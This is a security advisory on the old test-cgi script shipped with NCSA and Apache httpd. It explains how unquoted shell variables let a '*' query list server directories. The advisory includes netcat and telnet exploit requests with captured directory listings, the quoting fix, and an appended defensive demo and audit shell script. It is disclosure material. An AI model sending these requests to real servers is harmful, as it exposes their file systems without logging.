COMMAND

    httpd (test-cgi)

SYSTEMS AFFECTED

    httpd with test-cgi script

PROBLEM

    On many web sites there exists a file called test-cgi (usually  in
    the cgi-bin directory  or somewhere similar).  There is a  problem
    with many of these test-cgi files. If your test-cgi file  contains
    the following line (verbatim) then you are probably vulnerable.

    echo QUERY_STRING = $QUERY_STRING

    All of  these lines  should have  the variables  enclosed in loose
    quotes  (").  Without  these  quotes  certain  special  characters
    (specifically  '*')  get  expanded  where  they  shouldn't.   Thus
    submitting  a  query  of  '*'  will  return  the  contents  of the
    current  directory  (probably  where  all  of the cgi files are...
    gee,  there's  jj  and  phf.  Hmmm  what are all those other cgi's
    that  I  haven't  seen...  wonder  what  holes  exist  in those?).
    Sending  in  a  query  of  '/*'  will  list  the  root  directory.
    And so on, and so on.

    This is the  same as doing  `echo *` when  you've blown away  'ls'
    (not that this ever happens to anyone <grin>).

    The  easiest  way  to  list  out  the directories is via the query
    string.  However,  it  is  possible  to  do the same thing through
    many of the other variables (i.e. $REMOTE_HOST, $REMOTE_USER, etc.)
    in the right situations.

    Example exploit:

    Below are  examples (nc  is netcat  from avian.org,  if you  don't
    have it you  should get it  as it is  an invaluable tool.  You can
    always just telnet to port 80 and type in the GET... command.)

-----------------------------------------------------------------------------
machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80

CGI/1.0 test script report:

argc is 1. argv is /\*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
-----------------------------------------------------------------------------

    Or to see what other cgi-goodies are still floating around...

-----------------------------------------------------------------------------
machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80

CGI/1.0 test script report:

argc is 1. argv is \*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger
cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html
mail-query mail-query-2 majordomo majordomo.cf marker.cgi
menu message.cgi munger.cgi munger.note ncsa-default.tar post-query
query smartlist.cf src subscribe.cf test-cgi uptime
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
-----------------------------------------------------------------------------

    Some versions of NCSA and Apache have corrected the QUERY_STRING
    line, but not the CONTENT_TYPE or CONTENT_LENGTH lines, and these
    values can be easily spoofed (see example below). In fact, the
    CONTENT_TYPE line is potentially more 'dangerous' than the
    QUERY_STRING line because http daemons usually don't log this
    field.

    Example exploit:

        machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80

    or,

        machine% telnet www.host.com 80
        GET /cgi-bin/test-cgi HTTP/1.0
        Content-type: /*

        <Cgi output displayed here>

    or,

        machine% telnet www.host.com 80
        GET /cgi-bin/test-cgi /*
        Content-type: text/html

        This exploits SERVER_PORT.

    Another big problem is that these actions will not be logged by
    the http daemon. That means that if your test-cgi file is not
    protected adequately, your filesystem may have already been
    browsed, and you have no clue.

SOLUTION

    The quick fix is to place loose quotes around all of the variables
    in  the  test-cgi  file  (they  should  have  been  there from the
    beginning!).

    echo QUERY_STRING = "$QUERY_STRING"

    This incorrect file has been seen in at least several versions of
    NCSA and Apache.
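    The following is an added illustration, not the advisory's or NCSA's
    own code: a small POSIX shell script that runs the unquoted echo line
    beside the quoted fix inside a constructed throwaway directory, and a
    grep-based audit helper (the pattern is my own assumption) that counts
    unquoted echo lines in a test-cgi file so an admin can check a server
    without sending it a '*' query.

```shell
#!/bin/sh
# Added example (not the advisory's or NCSA's code): reproduces the unquoted
# expansion that turns a '*' query into a directory listing, shows that the
# quoted line from SOLUTION echoes the query back literally, and provides a
# small audit helper to find the vulnerable pattern in a test-cgi script.

# The vulnerable line: the shell expands $QUERY_STRING, then globs the
# result, so '*' becomes the names of the files in the current directory.
vulnerable_report() {
    echo QUERY_STRING = $QUERY_STRING
}

# The fixed line: double quotes suppress word splitting and globbing.
fixed_report() {
    echo QUERY_STRING = "$QUERY_STRING"
}

# Run report function $1 with QUERY_STRING=$2 inside a constructed, throwaway
# cgi-bin directory and print exactly what a client would have received.
run_in_sample_cgi_bin() {
    dir=$(mktemp -d) || return 1
    touch "$dir/jj" "$dir/phf" "$dir/test-cgi"   # constructed sample scripts
    (cd "$dir" && QUERY_STRING=$2 && "$1")
    rm -rf "$dir"
}

# Audit helper (assumed pattern): count echo lines whose trailing variable is
# not quoted, the shape described under PROBLEM. Prints 0 for a fixed file.
audit_test_cgi() {
    grep -c 'echo .*= *\$[A-Za-z_][A-Za-z0-9_]*[[:space:]]*$' "$1" || true
}

# Write constructed vulnerable ($1) and fixed ($2) scripts as audit input.
write_sample_scripts() {
    printf 'echo QUERY_STRING = $QUERY_STRING\necho CONTENT_TYPE = $CONTENT_TYPE\n' > "$1"
    printf 'echo QUERY_STRING = "$QUERY_STRING"\necho CONTENT_TYPE = "$CONTENT_TYPE"\n' > "$2"
}

if [ "${1:-}" = "demo" ]; then
    run_in_sample_cgi_bin vulnerable_report '*'   # QUERY_STRING = jj phf test-cgi
    run_in_sample_cgi_bin fixed_report '*'        # QUERY_STRING = *
fi
```

    Run it as `sh script.sh demo` to see the two outputs side by side.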